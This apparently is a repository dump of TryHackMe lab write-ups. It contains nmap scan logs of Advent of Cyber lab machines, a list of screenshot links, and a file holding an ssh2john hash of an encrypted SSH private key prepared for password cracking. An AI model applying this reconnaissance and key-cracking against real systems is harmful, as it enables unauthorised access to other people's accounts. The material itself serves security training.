day20_cronjob.log 10.10.158.199 2 | Nmap scan report for 10.10.158.199 3 | Host is up (0.29s latency). 4 | Not shown: 999 closed ports 5 | PORT STATE SERVICE VERSION 6 | 4567/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 7 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 8 | 9 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 10 | # Nmap done at Mon Sep 28 13:43:48 2020 -- 1 IP address (1 host up) scanned in 25.20 seconds 11 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day24_elf_stalk.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Oct 21 17:07:41 2020 as: nmap -sV -p- -oN day24_elf_stalk.log 10.10.171.70 2 | Nmap scan report for 10.10.171.70 3 | Host is up (0.22s latency). 4 | Not shown: 65529 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 7 | 111/tcp open rpcbind 2-4 (RPC #100000) 8 | 5601/tcp open esmagent? 9 | 8000/tcp open http SimpleHTTPServer 0.6 (Python 3.7.4) 10 | 9200/tcp open http Elasticsearch REST API 6.4.2 (name: sn6hfBl; cluster: elasticsearch; Lucene 7.4.0) 11 | 9300/tcp open vrace? 12 | 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : 13 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 14 | SF-Port5601-TCP:V=7.80%I=7%D=10/21%Time=5F90447F%P=x86_64-pc-linux-gnu%r(G 15 | SF:etRequest,1D3,"HTTP/1\.1\x20200\x20OK\r\nkbn-name:\x20kibana\r\nkbn-xpa 16 | SF:ck-sig:\x205a29ca259924bec4872ad69d3677ec71\r\ncache-control:\x20no-cac 17 | SF:he\r\ncontent-type:\x20text/html;\x20charset=utf-8\r\ncontent-length:\x 18 | SF:20217\r\naccept-ranges:\x20bytes\r\nDate:\x20Wed,\x2021\x20Oct\x202020\ 19 | SF:x2014:24:01\x20GMT\r\nConnection:\x20close\r\n\r\n")% 24 | SF:r(HTTPOptions,117,"HTTP/1\.1\x20404\x20Not\x20Found\r\nkbn-name:\x20kib 25 | SF:ana\r\nkbn-xpack-sig:\x205a29ca259924bec4872ad69d3677ec71\r\ncontent-ty 26 | SF:pe:\x20application/json;\x20charset=utf-8\r\ncache-control:\x20no-cache 27 | SF:\r\ncontent-length:\x2038\r\nDate:\x20Wed,\x2021\x20Oct\x202020\x2014:2 28 | SF:4:01\x20GMT\r\nConnection:\x20close\r\n\r\n{\"statusCode\":404,\"error\ 29 | SF:":\"Not\x20Found\"}")%r(RTSPRequest,1C,"HTTP/1\.1\x20400\x20Bad\x20Requ 30 | SF:est\r\n\r\n")%r(RPCCheck,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n 31 | SF:")%r(DNSVersionBindReqTCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\ 32 | SF:n")%r(DNSStatusRequestTCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\ 33 | SF:n")%r(Help,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(SSLSessio 34 | SF:nReq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TerminalServerC 35 | SF:ookie,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TLSSessionReq, 36 | SF:1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(Kerberos,1C,"HTTP/1\ 37 | SF:.1\x20400\x20Bad\x20Request\r\n\r\n")%r(SMBProgNeg,1C,"HTTP/1\.1\x20400 38 | SF:\x20Bad\x20Request\r\n\r\n")%r(X11Probe,1C,"HTTP/1\.1\x20400\x20Bad\x20 39 | SF:Request\r\n\r\n")%r(FourOhFourRequest,12D,"HTTP/1\.1\x20404\x20Not\x20F 40 | SF:ound\r\nkbn-name:\x20kibana\r\nkbn-xpack-sig:\x205a29ca259924bec4872ad6 41 | SF:9d3677ec71\r\ncontent-type:\x20application/json;\x20charset=utf-8\r\nca 42 | SF:che-control:\x20no-cache\r\ncontent-length:\x2060\r\nDate:\x20Wed,\x202 43 | SF:1\x20Oct\x202020\x2014:24:07\x20GMT\r\nConnection:\x20close\r\n\r\n{\"s 44 | SF:tatusCode\":404,\"error\":\"Not\x20Found\",\"message\":\"Not\x20Found\" 45 | SF:}"); 46 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 47 | SF-Port9300-TCP:V=7.80%I=7%D=10/21%Time=5F904480%P=x86_64-pc-linux-gnu%r(G 48 | SF:etRequest,18,"This\x20is\x20not\x20an\x20HTTP\x20port")%r(HTTPOptions,1 49 | SF:8,"This\x20is\x20not\x20an\x20HTTP\x20port")%r(RTSPRequest,18,"This\x20 50 | SF:is\x20not\x20an\x20HTTP\x20port")%r(FourOhFourRequest,18,"This\x20is\x2 51 | SF:0not\x20an\x20HTTP\x20port")%r(SIPOptions,18,"This\x20is\x20not\x20an\x 52 | SF:20HTTP\x20port"); 53 | 54 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 55 | # Nmap done at Wed Oct 21 17:24:14 2020 -- 1 IP address (1 host up) scanned in 993.12 seconds 56 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day7_skillingup.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sat Oct 3 13:13:03 2020 as: nmap -sV -O -oN day7_skillingup.log 10.10.26.123 2 | Nmap scan report for 10.10.26.123 3 | Host is up (0.24s latency). 4 | Not shown: 996 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 7 | 111/tcp open rpcbind 2-4 (RPC #100000) 8 | 999/tcp open http SimpleHTTPServer 0.6 (Python 3.6.8) 9 | 1070/tcp filtered gmrupdateserv 10 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 11 | TCP/IP fingerprint: 12 | OS:SCAN(V=7.80%E=4%D=10/3%OT=22%CT=1%CU=34664%PV=Y%DS=4%DC=I%G=Y%TM=5F784EF 13 | OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS 14 | OS:(O1=M509ST11NW6%O2=M509ST11NW6%O3=M509NNT11NW6%O4=M509ST11NW6%O5=M509ST1 15 | OS:1NW6%O6=M509ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN 16 | OS:(R=Y%DF=Y%T=FF%W=6903%O=M509NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=FF%S=O%A=S+%F=A 17 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R 18 | OS:=Y%DF=Y%T=FF%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F 19 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=FF%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% 20 | OS:T=FF%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=FF%CD 21 | OS:=S) 22 | 23 | Network Distance: 4 hops 24 | 25 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 26 | # Nmap done at Sat Oct 3 13:14:16 2020 -- 1 IP address (1 host up) scanned in 74.17 seconds 27 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day8_suid.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 30 14:52:52 2020 as: nmap -p 1-65535 -oN day8_suid.log 10.10.68.225 2 | Nmap scan report for 10.10.68.225 3 | Host is up (0.22s latency). 4 | Not shown: 65534 closed ports 5 | PORT STATE SERVICE 6 | 65534/tcp open unknown 7 | 8 | # Nmap done at Wed Sep 30 15:05:51 2020 -- 1 IP address (1 host up) scanned in 778.33 seconds 9 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day01/authid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day01/authid.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day01/mcinventory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day01/mcinventory.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day02/BYOE.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day02/BYOE.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day02/credentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day02/credentials.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day02/gobuster.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day02/gobuster.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day02/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day02/source.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day03/packet_998.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day03/packet_998.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day03/shadow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day03/shadow.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day03/telnet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day03/telnet.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day05/ada.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day05/ada.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day05/metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day05/metadata.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day05/twitter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day05/twitter.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day05/wayback.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day05/wayback.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day05/woman.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day05/woman.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/christmas_lists.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/christmas_lists.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/cyberchef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/cyberchef.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/dns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/dns.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/fcrackzip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/fcrackzip.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/password.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/password.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/steghide.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/steghide.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day06/zip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day06/zip.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day07/file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day07/file.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day08/find.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day08/find.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day08/su.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day08/su.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day10/options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day10/options.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day10/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day10/reverse_shell.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day10/struts2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day10/struts2.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day11/db.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day11/db.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day11/file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day11/file.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day11/mysql.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day11/mysql.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day11/tables.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day11/tables.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day11/users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day11/users.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day13/creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day13/creds.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day13/gobuster.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day13/gobuster.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day13/retro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day13/retro.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day14/bucket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day14/bucket.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day14/file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day14/file.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day15/burpsuite.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day15/burpsuite.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day15/notes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day15/notes.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day15/password.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day15/password.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day15/script.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day15/script.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day15/shadow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day15/shadow.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day18/message.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day18/message.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day18/nc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day18/nc.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day19/cmd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day19/cmd.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day19/cookie.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day19/cookie.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day19/find.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day19/find.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day19/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day19/flag.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day19/ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day19/ls.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day20/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day20/home.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day20/scripts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day20/scripts.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day21/r2_main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day21/r2_main.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day22/r2_if.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day22/r2_if.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day23/dbs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day23/dbs.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day23/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day23/flag.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day23/messages.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day23/messages.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day23/tables.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day23/tables.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day23/users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day23/users.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day24/kibana.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day24/kibana.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day24/log.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day24/log.png -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/screenshots/day24/password.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/screenshots/day24/password.png -------------------------------------------------------------------------------- /room_basic_pentest/forjohn.txt: -------------------------------------------------------------------------------- 1 | kay_id_rsa:$sshng$1$16$6ABA7DE35CDB65070B92C1F760E2FE75$2352$22835bfc9d2ad8f779e84676de801a2712ef86e499d5cad1af838d19402729c471837fbdbe7eb172e8e9cd40ee52d959a3d772204241e305194ee7813ec99be3ced17455644ce550ad51edcb52b668bcb62e46b60a77e3cfc2e5bfe14c69db0d5d1be3c3f1d18867173d8f01ee7b00d5e88f62b3d91c81f740e14862548f318bfbf510bae62e9fae40d2bf15f36dd7d702400dfb74f9154e3d00454a049b599cb4c4070df59b18efd252d702a21a5f941f79731a70840e51608701396955798d946e01686edc557b350263e279f971eee37846e07d3594b8669d25a656c26f85046b05f44edf9529dea4ce1f8193469485640909d9dbfd4f9d45ab2ede8c6aca494a53674fb1e53bae5bcf02a6bacbea202bfc284db9d3ae446780aa8b431325948599c9ee32acb1137dcdbbe61cd555887a1642e0b4e7da972d1b32a188accf9e595a173ab64f065bfc8b23530dd0c4de3463a9b38694fb34d6101628847150f684af5f25719f8e958d34570da834bdb129482d4295768f01f4e3219d5db7c92d85a55f19c926954c84a0ba6bbe697b8655c5f98cb7441c2b8a0a3b569118ca8b14dc1a3f125857a1dab94a1513137b6d4a68f9e2d856ce66a39b5ba560e18b43517e718fd6de9b9fb4ef6fbec009ac86cc774ba4802a666bffd21c114e7adb455858d4251fef118d99b9b3607ccd130329a44da2f261526951422440b7703827e53bd05177e1e82249455ae177157256a563b28b7e0b317b99b5a6e6716c4cf3e53a79dd0ba266ad41148de21b2f305c5ba6d7e6cf9bf7978579c79632655e0745a1aa73ed0ed56d837b05763c69d218065ea2b86c03019cce1c84570aed1a6f0918ec2b25985440c9318bdcf3b674cacbcea559fd5a714e51d38df94e2960fe8f98d53865dd907a434859811764864ccb2a6e18215d03448045febf90ac06a073800822b78a101028a6cef927e581705a1d76fa934a1c31001620ec5826e9cf28df1bcf39502c9b3526b65789b86555a3de57b5f6e4d694caee6ee1b82d1616ff7fc68129b7a5e1795647ee07c5ba2da49c7a45507210f67f91588eab74b51a9c074916689f7db4c40e2138f91c1bae890f21e54ba077dbcb95888e836ba7eb6223a70384c48c94cf3b946971210a40a220eb980809ba5c5a3d54e08f6610765e1dcd2bda5cae7d96e77d852bd2a095a3cfa64bc5fbe6c79ea0dcfc6ae40be03238217213ab9b1a0873f8cbf9ed9b3d40dd0d0536365702a7452bf85301d84c4397621979cdc37b5b983f301af78655f352684c57799037f633a09b755ba0de9c017a73d76e0a8f46c4c33c4207358a8b408f1c52d8b8ca0378ba8ffcd224a125e5a0973c6997a6225e51007e600c22d3e24ebbc1e8bd8ff250eb32d44f4bd298ba27a3522215db0c3b89d49f2277cfedd74c3b59a1497936263826308f2e14cd363025aa7a5c39aa9a77b815dd10ff6ac9a5d8bda4074513f0fad3b6df926da5ca3c51f47479a8c271a60dab493fe78cadce92f3debe1c05ef72f3f194a36d23bfa3b0d4f0b8f04236d485be8d7d97dfb1c5de79613568d58f113308e8a73c7b87ca11b7b53e63d37f055b5bb7e5f39982e7bbedea3aae16daa3b29ccd8f9d98d53e97a1fbc0c1a2e701e5b7d7b224a4371358b02103e25b29c54138b8c4b7c9706967fe384b263c284ceb0336887e7da79e3c10d54d85689c0db4c379388b2138d0c40017fd2256aae3a2d21a93116a134d5f0ce8ce1fbf2c61509868c823fccdff62aca54796ff99aa5b0bc588af10537f26eccfa6962e595fbeac9df244f6cbaf6b77a11cfd8078de615833305fe0ae0d22173e8d744435fe3a69a81313109f9c5cdcb56d67544a36aa27a3b7c0db50b3b829972368ff2ed998c1910b392720c0d4cbaa907a49f2c38f970503971d64b6972f5b7b5c34735a08129c2b7ee82c6ccc49ddc943a5ae2f4467c5d7a07859e39ae00023c771d59caca0817ce412d35849abd9d225ed96e34de5266b31fd4dd82dab9469582b1e41687a39f108da54b6e84771542cb11f5c522e62b79b6867e8a20df2e8c9bf9ff36634c0de536fa3d377fa27543b6c90895f13bdf50f03b2dd97e5d25d452fa6a0d225704eb3c19751864285dfe